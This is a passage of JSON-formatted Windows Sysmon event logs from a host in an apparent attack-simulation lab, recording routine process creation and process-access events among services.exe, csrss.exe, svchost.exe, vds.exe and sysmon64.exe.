{E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.518","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010E2FD0200}","Image":"C:\\Windows\\System32\\vds.exe","FileVersion":"10.0.14393.2608 (rs1_release.181024-1742)","Description":"Virtual Disk Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"vds.exe","CommandLine":"C:\\Windows\\System32\\vds.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E2FD0200}\r\nTargetProcessId: 3520\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E2FD0200}","TargetProcessId":"3520","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010E2FD0200}\r\nTargetProcessId: 3520\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010E2FD0200}","TargetProcessId":"3520","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1280,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.521\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.521","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+